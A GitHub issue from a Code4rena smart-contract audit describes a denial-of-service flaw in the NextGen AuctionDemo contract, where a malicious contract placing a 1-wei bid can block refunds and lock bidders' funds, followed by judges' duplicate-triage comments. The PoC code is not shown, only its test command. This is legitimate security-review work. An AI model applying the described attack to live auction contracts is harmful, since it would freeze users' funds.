-
Notifications
You must be signed in to change notification settings - Fork 3
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Attacker can permanently DoS every auction in AuctionDemo
#1508
Comments
141345 marked the issue as duplicate of #1952 |
alex-ppg marked the issue as not a duplicate |
alex-ppg marked the issue as primary issue |
alex-ppg marked the issue as duplicate of #734 |
alex-ppg marked the issue as satisfactory |
Hey @alex-ppg, can you consider choosing #1508 for the report over #734. Although #734 has a solid explanation and acknowledgment of the bot issues, it lacks a detailed attack path and a coded PoC, in fact, it merely states,: "With the current implementation, a gas bomb can be implemented to perform the attack." In contrast, #1508, provides a valid/running PoC, a clear impact with the acknowledgment of #739 (left a comment there too). That being said, I am aware that a report being "better" is extremely subjective, and will respect your final decision as a judge. Thanks! |
Hey @0xbtk, thanks for your contribution to the PJQA process! I understand your concern and criticism but will retain my current judgment. Given that this submission refers to a direct escalation of a bot report finding, it must be mentioned for transparency. As such, I have opted to award the |
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104-L120
Vulnerability details
Impact
An attacker can disrupt every auction in
AuctionDemo
permanently by placing a minimal bid of 1 wei with a malicious contract during the auction's initiation. This action can result in a permanent Denial-of-Service (DoS), effectively locking all user funds in the contract.Note
Attackers can exploit this using
onERC721Received
too, but it's costlier since they need to be the highest bidder to claim the NFT.Proof of Concept
Here is a coded PoC to demonstrate the issue:
Test Result:
Test Setup:
NextGenSecurityReview
forge test --mt testDoSAuctionDemo -vvv
Tools Used
Manual review
Recommended Mitigation Steps
To mitigate this vulnerability, consider implementing the following steps:
Assessed type
DoS
The text was updated successfully, but these errors were encountered: